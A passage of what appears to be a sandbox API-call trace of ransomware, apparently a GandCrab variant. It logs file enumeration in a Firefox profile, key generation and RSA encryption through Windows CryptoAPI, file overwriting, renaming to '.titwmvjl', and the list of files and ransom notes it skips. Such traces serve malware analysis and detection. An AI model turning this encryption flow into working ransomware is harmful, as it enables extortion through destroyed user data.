x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0082.226] WriteFile (in: hFile=0x248, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e2fc, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e2fc*=0x2162, lpOverlapped=0x0) returned 1 [0082.227] CloseHandle (hObject=0x248) returned 1 [0082.227] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.227] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0082.227] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x1b, wMilliseconds=0x222)) [0082.227] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0082.228] GetWindowsDirectoryW (in: lpBuffer=0x2310000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0082.228] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2310200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2310600, lpMaximumComponentLength=0x2310608, lpFileSystemFlags=0x2310604, lpFileSystemNameBuffer=0x2310400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2310600*=0xd2ca4def, lpMaximumComponentLength=0x2310608*=0xff, lpFileSystemFlags=0x2310604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0082.228] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\d2ca4a09d2ca4deb61a.lock") returned 124 [0082.228] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x248 [0082.229] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.229] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.229] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\") returned 100 [0082.229] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\*" [0082.229] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\*", fInfoLevelId=0x1, lpFindFileData=0x259e318, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e318) returned 0x503438 [0082.229] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0082.229] FindNextFileW (in: hFindFile=0x503438, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0082.230] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0082.230] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0082.230] FindNextFileW (in: hFindFile=0x503438, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0082.230] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0082.230] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0082.230] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\d2ca4a09d2ca4deb61a.lock" [0082.230] lstrlenW (lpString=".titwmvjl") returned 9 [0082.230] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\d2ca4a09d2ca4deb61a.lock") returned 124 [0082.230] VirtualAlloc (lpAddress=0x0, dwSize=0x138, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0082.230] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 133 [0082.231] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\d2ca4a09d2ca4deb61a.lock") returned 124 [0082.231] lstrlenW (lpString=".lock") returned 5 [0082.231] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0082.231] wsprintfW (in: param_1=0x2310000, param_2="%ws " | out: param_1=".lock ") returned 6 [0082.231] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.231] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.231] FindNextFileW (in: hFindFile=0x503438, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0082.231] lstrcmpW (lpString1="gmpopenh264.dll", lpString2=".") returned 1 [0082.231] lstrcmpW (lpString1="gmpopenh264.dll", lpString2="..") returned 1 [0082.231] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\", lpString2="gmpopenh264.dll" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\gmpopenh264.dll") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\gmpopenh264.dll" [0082.231] lstrlenW (lpString=".titwmvjl") returned 9 [0082.232] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\gmpopenh264.dll") returned 115 [0082.232] VirtualAlloc (lpAddress=0x0, dwSize=0x126, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0082.232] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\gmpopenh264.dll.titwmvjl") returned 124 [0082.232] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\gmpopenh264.dll") returned 115 [0082.232] lstrlenW (lpString=".dll") returned 4 [0082.232] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0082.232] wsprintfW (in: param_1=0x2310000, param_2="%ws " | out: param_1=".dll ") returned 5 [0082.232] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.232] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.233] FindNextFileW (in: hFindFile=0x503438, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0082.233] lstrcmpW (lpString1="gmpopenh264.info", lpString2=".") returned 1 [0082.233] lstrcmpW (lpString1="gmpopenh264.info", lpString2="..") returned 1 [0082.233] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\", lpString2="gmpopenh264.info" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\gmpopenh264.info") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\gmpopenh264.info" [0082.233] lstrlenW (lpString=".titwmvjl") returned 9 [0082.233] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\gmpopenh264.info") returned 116 [0082.233] VirtualAlloc (lpAddress=0x0, dwSize=0x128, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0082.233] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\gmpopenh264.info.titwmvjl") returned 125 [0082.233] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\gmpopenh264.info") returned 116 [0082.233] lstrlenW (lpString=".info") returned 5 [0082.233] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0082.233] wsprintfW (in: param_1=0x2310000, param_2="%ws " | out: param_1=".info ") returned 6 [0082.233] lstrcmpiW (lpString1=".info", lpString2=".titwmvjl") returned -1 [0082.234] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.234] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\gmpopenh264.info") returned 116 [0082.234] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\gmpopenh264.info") returned 116 [0082.234] lstrcmpiW (lpString1="gmpopenh264.info", lpString2="desktop.ini") returned 1 [0082.234] lstrcmpiW (lpString1="gmpopenh264.info", lpString2="autorun.inf") returned 1 [0082.234] lstrcmpiW (lpString1="gmpopenh264.info", lpString2="ntuser.dat") returned -1 [0082.234] lstrcmpiW (lpString1="gmpopenh264.info", lpString2="iconcache.db") returned -1 [0082.234] lstrcmpiW (lpString1="gmpopenh264.info", lpString2="bootsect.bak") returned 1 [0082.234] lstrcmpiW (lpString1="gmpopenh264.info", lpString2="boot.ini") returned 1 [0082.234] lstrcmpiW (lpString1="gmpopenh264.info", lpString2="ntuser.dat.log") returned -1 [0082.234] lstrcmpiW (lpString1="gmpopenh264.info", lpString2="thumbs.db") returned -1 [0082.234] lstrcmpiW (lpString1="gmpopenh264.info", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0082.234] lstrcmpiW (lpString1="gmpopenh264.info", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0082.234] lstrcmpiW (lpString1="gmpopenh264.info", lpString2="KRAB-DECRYPT.html") returned -1 [0082.234] lstrcmpiW (lpString1="gmpopenh264.info", lpString2="CRAB-DECRYPT.html") returned 1 [0082.234] lstrcmpiW (lpString1="gmpopenh264.info", lpString2="KRAB-DECRYPT.txt") returned -1 [0082.234] lstrcmpiW (lpString1="gmpopenh264.info", lpString2="CRAB-DECRYPT.txt") returned 1 [0082.234] lstrcmpiW (lpString1="gmpopenh264.info", lpString2="ntldr") returned -1 [0082.234] lstrcmpiW (lpString1="gmpopenh264.info", lpString2="NTDETECT.COM") returned -1 [0082.234] lstrcmpiW (lpString1="gmpopenh264.info", lpString2="Bootfont.bin") returned 1 [0082.234] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\gmpopenh264.info") returned 116 [0082.234] lstrlenW (lpString=".info") returned 5 [0082.234] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0082.235] wsprintfW (in: param_1=0x2310000, param_2="%s " | out: param_1=".info ") returned 6 [0082.235] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.235] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0082.235] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\gmpopenh264.info" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\gmpopenh264.info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2dc [0082.236] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0082.236] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.236] CryptAcquireContextW (in: phProv=0x259e194, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e194*=0x4c9980) returned 1 [0082.241] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2320000 [0082.241] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0082.241] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0082.241] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e220 | out: pbBuffer=0x259e220) returned 1 [0082.241] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.242] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0082.242] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.242] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.242] CryptAcquireContextW (in: phProv=0x259e194, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e194*=0x4c9980) returned 1 [0082.246] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2320000 [0082.246] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0082.246] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0082.246] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e240 | out: pbBuffer=0x259e240) returned 1 [0082.246] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.246] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0082.246] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.247] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.247] CryptAcquireContextW (in: phProv=0x259e188, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e188*=0x4c9980) returned 1 [0082.250] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.251] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e18c | out: phKey=0x259e18c*=0x5031f8) returned 1 [0082.251] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.251] CryptGetKeyParam (in: hKey=0x5031f8, dwParam=0x8, pbData=0x259e180, pdwDataLen=0x259e184, dwFlags=0x0 | out: pbData=0x259e180*=0x800, pdwDataLen=0x259e184*=0x4) returned 1 [0082.251] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.251] CryptEncrypt (in: hKey=0x5031f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2310000*, pdwDataLen=0x259e1b8*=0xc8, dwBufLen=0x100 | out: pbData=0x2310000*, pdwDataLen=0x259e1b8*=0x100) returned 1 [0082.252] GetLastError () returned 0x0 [0082.252] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.252] CryptDestroyKey (hKey=0x5031f8) returned 1 [0082.252] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.252] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0082.252] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.252] CryptAcquireContextW (in: phProv=0x259e188, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e188*=0x4c9980) returned 1 [0082.256] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.257] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e18c | out: phKey=0x259e18c*=0x5035b8) returned 1 [0082.257] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.257] CryptGetKeyParam (in: hKey=0x5035b8, dwParam=0x8, pbData=0x259e180, pdwDataLen=0x259e184, dwFlags=0x0 | out: pbData=0x259e180*=0x800, pdwDataLen=0x259e184*=0x4) returned 1 [0082.257] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.257] CryptEncrypt (in: hKey=0x5035b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2310100*, pdwDataLen=0x259e1b8*=0xc8, dwBufLen=0x100 | out: pbData=0x2310100*, pdwDataLen=0x259e1b8*=0x100) returned 1 [0082.257] GetLastError () returned 0x0 [0082.258] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.258] CryptDestroyKey (hKey=0x5035b8) returned 1 [0082.258] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.258] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0082.258] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2320000 [0082.258] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0082.259] ReadFile (in: hFile=0x2dc, lpBuffer=0x2320000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e264, lpOverlapped=0x0 | out: lpBuffer=0x2320000*, lpNumberOfBytesRead=0x259e264*=0x74, lpOverlapped=0x0) returned 1 [0082.270] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0xffffff8c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.270] WriteFile (in: hFile=0x2dc, lpBuffer=0x2650000*, nNumberOfBytesToWrite=0x74, lpNumberOfBytesWritten=0x259e248, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesWritten=0x259e248*=0x74, lpOverlapped=0x0) returned 1 [0082.272] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.272] WriteFile (in: hFile=0x2dc, lpBuffer=0x2310000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e248, lpOverlapped=0x0 | out: lpBuffer=0x2310000*, lpNumberOfBytesWritten=0x259e248*=0x21c, lpOverlapped=0x0) returned 1 [0082.287] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.291] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.292] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.292] CloseHandle (hObject=0x2dc) returned 1 [0082.301] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\gmpopenh264.info" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\gmpopenh264.info"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\gmpopenh264.info.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\gmpopenh264.info.titwmvjl"), dwFlags=0x1) returned 1 [0082.302] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.302] FindNextFileW (in: hFindFile=0x503438, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0082.302] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0082.302] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0082.302] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\TITWMVJL-DECRYPT.txt" [0082.302] lstrlenW (lpString=".titwmvjl") returned 9 [0082.302] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\TITWMVJL-DECRYPT.txt") returned 120 [0082.302] VirtualAlloc (lpAddress=0x0, dwSize=0x130, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0082.304] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 129 [0082.304] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\TITWMVJL-DECRYPT.txt") returned 120 [0082.304] lstrlenW (lpString=".txt") returned 4 [0082.304] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0082.304] wsprintfW (in: param_1=0x2310000, param_2="%ws " | out: param_1=".txt ") returned 5 [0082.304] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0082.304] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.304] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\TITWMVJL-DECRYPT.txt") returned 120 [0082.304] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\TITWMVJL-DECRYPT.txt") returned 120 [0082.304] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0082.305] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0082.305] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0082.305] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0082.305] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0082.305] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0082.305] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0082.305] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0082.305] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.305] FindNextFileW (in: hFindFile=0x503438, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 0 [0082.305] FindClose (in: hFindFile=0x503438 | out: hFindFile=0x503438) returned 1 [0082.306] CloseHandle (hObject=0x248) returned 1 [0082.306] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0082.306] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0082.306] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0082.306] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\d2ca4a09d2ca4deb61a.lock") 